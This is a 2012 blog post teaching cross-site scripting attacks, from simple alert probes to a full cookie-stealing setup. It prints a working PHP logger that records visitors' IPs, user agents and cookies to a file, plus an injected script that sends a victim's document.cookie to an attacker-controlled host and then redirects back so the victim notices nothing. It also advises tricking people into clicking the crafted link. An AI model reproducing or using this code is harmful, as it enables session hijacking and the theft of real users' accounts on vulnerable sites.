Search This Blog

Friday, June 1, 2012

XSS Attack

COOKIE:
A cookie is the variable that web-browsers use to store your login credentials. Without a cookie, you cannot "stay logged in" on websites.


CROSS SITE SCRIPTING:
Cross-Site Scripting is the process of injecting JavaScript (mainly) and also HTML into a webpage.
@ -XSS attacks almost always focus upon sites which use cookies for storing our username and password.
@-XSS is used to harm the website (may be defacing )



Now the question is how to check whether the site is xss vulnerable or not ?
There are two methods to check this:

1.POST:: http://www.target.com/search.php ( we put malacious code in search engine)



Code:
<script>alert(“xss”);</script>


2.GEThttp://www.target.com/search=<script>alert("xss");</script>
We directly put the script in url of browser.

what else we can do ..??
-->Insert image:



Code:
<img src=“url of the image”></img>


-->Insert message:


Code:
<b>this is hacked </b>


-->Redirect to your page :


Code:
<script>window.open( "http://www.yoursite.com/" )</script>


But main aim of xss is to steal cookies so here is cookie stealing.
COOKIE STEALING TUTORIAL:



code:

<?php

function GetIP()
{
    if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown"))
        $ip = getenv("HTTP_CLIENT_IP");
    else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown"))
        $ip = getenv("HTTP_X_FORWARDED_FOR");
    else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown"))
        $ip = getenv("REMOTE_ADDR");
    else if (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], "unknown"))
        $ip = $_SERVER['REMOTE_ADDR'];
    else
        $ip = "unknown";
    return($ip);
}

function logData()
{
    $ipLog="log.txt";
    $cookie = $_SERVER['QUERY_STRING'];
    $register_globals = (bool) ini_get('register_gobals');
    if ($register_globals) $ip = getenv('REMOTE_ADDR');
    else $ip = GetIP();

    $rem_port = $_SERVER['REMOTE_PORT'];
    $user_agent = $_SERVER['HTTP_USER_AGENT'];
    $rqst_method = $_SERVER['METHOD'];
    $rem_host = $_SERVER['REMOTE_HOST'];
    $referer = $_SERVER['HTTP_REFERER'];
    $date=date ("l dS of F Y h:i:s A");
    $log=fopen("$ipLog", "a+");

    if (preg_match("/\bhtm\b/i", $ipLog) || preg_match("/\bhtml\b/i", $ipLog))
        fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE{ : } $date | COOKIE:  $cookie <br>");
    else
        fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host |  Agent: $user_agent | METHOD: $rqst_method | REF: $referer |  DATE: $date | COOKIE:  $cookie \n\n");
    fclose($log);
}

logData();

?>





now how to use this code???
This is done by three-step process consisting of the injected script, the cookie recorder, and the log file.

First you'll need to get an account on a server and create two files, log.txt and giveyourname.php. You can leave log.txt empty. This is the file your cookie stealer will write to. Now paste this php code into your cookie stealer script (give your name.php) [code metion above].
above script will record the cookies of every user that views it.



code
<script language= "JavaScript">document.location="http://yoursite.com/giveyourname.php?cookie=" + document.cookie;document.location="http://www.whateversite.com"</script>


now above code is injected to the xss vulnerable site page via get or post method: what does this code do??
The above code redirects the viewer to your script, which records their cookie to your log file. It then redirects the viewer back to the unmodified search page so they don't know anything happened.


If this code works then you'll automatically gets the cookie in yoursite, other wise you have to do some hard work !! grab the link which you get after the insertion of above script. And manually get someone to use that link if necessary. o0ps all s done at this point.

##All you need to do now is go to your website and check the log file

Add To Google BookmarksStumble ThisFav This With TechnoratiAdd To Del.icio.usDigg ThisAdd To RedditTwit ThisAdd To FacebookAdd To Yahoo

0 comments:

Post a Comment